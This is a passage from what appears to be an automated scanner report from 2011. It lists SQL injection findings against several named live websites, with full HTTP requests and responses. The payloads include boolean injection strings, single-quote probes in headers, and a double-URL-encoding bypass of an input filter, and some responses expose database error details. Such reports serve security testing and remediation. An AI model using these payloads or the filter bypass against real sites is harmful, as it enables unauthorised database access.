\"ipt>\\n<scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\"\\nsrc=\\\"http://pagead2.googlesyndication.com/pagead/show_ads.js\\\">\\n<\/scr\" + \"ipt><\/body>\\n<\/html>\";\n var targetFrame = fw_scope.getElementById(\"_fw_frame_160x600slot\");
...[SNIP]...

1.4. http://bestbuyon.com/listing/all [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bestbuyon.com
Path:   /listing/all

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /listing/all?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: bestbuyon.com
Proxy-Connection: keep-alive
Referer: http://bestbuyon.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c56b3975764a4c1c23c3ba51229ba19=4db3cf7b358a53406884c4c8c1251271; has_js=1; __utmz=201133757.1300542418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-898677016-1300542417918; __utma=201133757.995275835.1300542418.1300542418.1300542418.1; __utmc=201133757; __utmb=201133757.3.8.1300542417929

Response 1

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 14:26:31 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 19 Mar 2011 14:26:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 92802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-7996444b6a25560149a05c472d868f27" value="form-7996444b6a25560149a05c472d868f27" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
</div>


</div></form>
</div>
           </div>
       </div>
       <div id="core" class="content-container">
           <div class="content">
                               <div class="column-a column">
                   <div class="breadcrumb"> <span class="breadcrumb-separator">&lt;</span> <a href="/">Home</a></div>                    
                                                                                                                                                               <div id="listing-page"><div id="nav" class="cufon-font-tabs"><a href="#" title="block_1" class="cufon-font-1"><span class="sw-hidden">BROWSE ALL</span><img src="/sites/default/files/signwriter/BROWSEALL-a0ee2a1818af0368f29b0de4ce1e2ff6-signwriter.png" alt="BROWSE ALL" title="" width="123" height="19" class="signwriter" /></a><a href="#" title="block_2" class="cufon-font-1"><span class="sw-hidden">VIDEOS</span><img src="/sites/default/files/signwriter/VIDEOS-e295b4d55446cf7af3134ce6d21ae2fb-signwriter.png" alt="VIDEOS" title="" width="75" height="19" class="signwriter" /></a><a href="#" title="block_3" class="cufon-font-1"><span class="sw-hidden">ARTICLES</span><img src="/sites/default/files/signwriter/ARTICLES-254cac6288124dab55b0af8f9040255e-signwriter.png" alt="ARTICLES" title="" width="96" height="19" class="signwriter" /></a><a href="#" title="block_4" class="cufon-font-1"><span class="sw-hidden">SLIDESHOWS</span><img src="/sites/default/files/signwriter/SLIDESHOWS-c3921868bf8617dc1e7069ed79e20569-signwriter.png" alt="SLIDESHOWS" title="" width="127" height="19" class="signwriter" /></a><div class="clear"></div> </div><div class="tab-panel"><div class="hiddencontent" id=block_1><div class="filters"><form action="/listing/all?1&#039;%20and%201%3d1--%20=1" accept-charset="UTF-8" method="post" id="bbyon-cm-listing-page-topic-filter-form">
<div><div class="form-item" id="edit-bbyon-cm-listing-topic-wrapper">
<label for="edit-bbyon-cm-li
...[SNIP]...

Request 2

GET /listing/all?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: bestbuyon.com
Proxy-Connection: keep-alive
Referer: http://bestbuyon.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c56b3975764a4c1c23c3ba51229ba19=4db3cf7b358a53406884c4c8c1251271; has_js=1; __utmz=201133757.1300542418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-898677016-1300542417918; __utma=201133757.995275835.1300542418.1300542418.1300542418.1; __utmc=201133757; __utmb=201133757.3.8.1300542417929

Response 2

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 14:26:35 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 19 Mar 2011 14:26:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 92784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-451d6576473cdbb25565666361684354" value="form-451d6576473cdbb25565666361684354" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
</div>


</div></form>
</div>
           </div>
       </div>
       <div id="core" class="content-container">
           <div class="content">
                               <div class="column-a column">
                   <div class="breadcrumb"> <span class="breadcrumb-separator">&lt;</span> <a href="/">Home</a></div>                    
                                                                                                                                                               <div id="listing-page"><div id="nav" class="cufon-font-tabs"><a href="#" title="block_1" class="cufon-font-1"><span class="sw-hidden">BROWSE ALL</span><img src="/sites/default/files/signwriter/BROWSEALL-a0ee2a1818af0368f29b0de4ce1e2ff6-signwriter.png" alt="BROWSE ALL" title="" width="123" height="19" class="signwriter" /></a><a href="#" title="block_2" class="cufon-font-1"><span class="sw-hidden">VIDEOS</span><img src="/sites/default/files/signwriter/VIDEOS-e295b4d55446cf7af3134ce6d21ae2fb-signwriter.png" alt="VIDEOS" title="" width="75" height="19" class="signwriter" /></a><a href="#" title="block_3" class="cufon-font-1"><span class="sw-hidden">ARTICLES</span><img src="/sites/default/files/signwriter/ARTICLES-254cac6288124dab55b0af8f9040255e-signwriter.png" alt="ARTICLES" title="" width="96" height="19" class="signwriter" /></a><a href="#" title="block_4" class="cufon-font-1"><span class="sw-hidden">SLIDESHOWS</span><img src="/sites/default/files/signwriter/SLIDESHOWS-c3921868bf8617dc1e7069ed79e20569-signwriter.png" alt="SLIDESHOWS" title="" width="127" height="19" class="signwriter" /></a><div class="clear"></div> </div><div class="tab-panel"><div class="hiddencontent" id=block_1><div class="filters"><form action="/listing/all?1&#039;%20and%201%3d2--%20=1" accept-charset="UTF-8" method="post" id="bbyon-cm-listing-page-topic-filter-form">
<div><div class="form-item" id="edit-bbyon-cm-listing-topic-wrapper">
<label for="edit-bbyon-cm-li
...[SNIP]...

1.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:46:29 GMT
Expires: Sat, 19 Mar 2011 14:46:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQDSRQRT=BCDOKCBCNDBPILMNGEFOIGMP; path=/
X-Powered-By: ASP.NET
Content-Length: 792
Connection: keep-alive

<br>Error Description:Incorrect syntax near the keyword 'Default'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutlet
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:46:32 GMT
Expires: Sat, 19 Mar 2011 14:46:32 GMT
Location: /Tracking/dot.gif
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQACQTSST=GNHBFPACFEHHLBBCJKANAEML; path=/
X-Powered-By: ASP.NET
Content-Length: 138
Connection: keep-alive

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Tracking/dot.gif">here</a>.</body>

1.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:46:23 GMT
Expires: Sat, 19 Mar 2011 14:46:23 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQSTQTRT=KMCGOIBCMEGIMJAGEGAADBCD; path=/
X-Powered-By: ASP.NET
Content-Length: 1227
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'undefined'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutletId = 48287
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:46:29 GMT
Expires: Sat, 19 Mar 2011 14:46:29 GMT
Location: /Tracking/dot.gif
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQACQTSST=JLHBFPACAHBAPPFFDELMMAJA; path=/
X-Powered-By: ASP.NET
Content-Length: 138
Connection: keep-alive

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Tracking/dot.gif">here</a>.</body>

1.7. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the adRotationId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302%2527&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:45:19 GMT
Expires: Sat, 19 Mar 2011 14:45:19 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCTTRTQ=ENFOCABCPIBFDFIEDMGAFMCP; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutletId = 48287, @adrot
...[SNIP]...

1.8. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the bannerCreativeAdModuleId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505%2527 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:45:28 GMT
Expires: Sat, 19 Mar 2011 14:45:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQDSRQRT=LIAOKCBCFKIOFENLHAINDNAC; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505%27, @campaignId = 6386, @syndicationOutletId = 48287, @ad
...[SNIP]...

1.9. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the campaignId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386%2527&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:45:16 GMT
Expires: Sat, 19 Mar 2011 14:45:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACTSTQQQ=IOPLLDBCJELPBBDJOMLNNGIO; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386%27, @syndicationOutletId = 48287, @ad
...[SNIP]...

1.10. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the siteId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936%2527&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:44:59 GMT
Expires: Sat, 19 Mar 2011 14:44:59 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQSTQTRT=AKPFOIBCFKAOGEMHOBCIEBKM; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936%27, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutletId = 48287, @ad
...[SNIP]...

1.11. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the syndicationOutletId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287%2527&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:45:10 GMT
Expires: Sat, 19 Mar 2011 14:45:11 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSRDCRQC=LGINKEACKNDHFBAHIKMGKIHG; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutletId = 48287%27, @ad
...[SNIP]...

1.12. http://wd.sharethis.com/api/getApi.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wd.sharethis.com
Path:   /api/getApi.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /api/getApi.php?return=json&cb=getPubGA_onSuccess&service=getPublisherDomains&publisher=/1'null HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.cf465dc001621acac71bcb1a36056e40.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes

Response 1

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:50:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 112

getPubGA_onSuccess({"status":"FAILURE","statusMessage":"Failed to load publisher domains","statusNumber":null});

Request 2

GET /api/getApi.php?return=json&cb=getPubGA_onSuccess&service=getPublisherDomains&publisher=/1''null HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.cf465dc001621acac71bcb1a36056e40.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes

Response 2

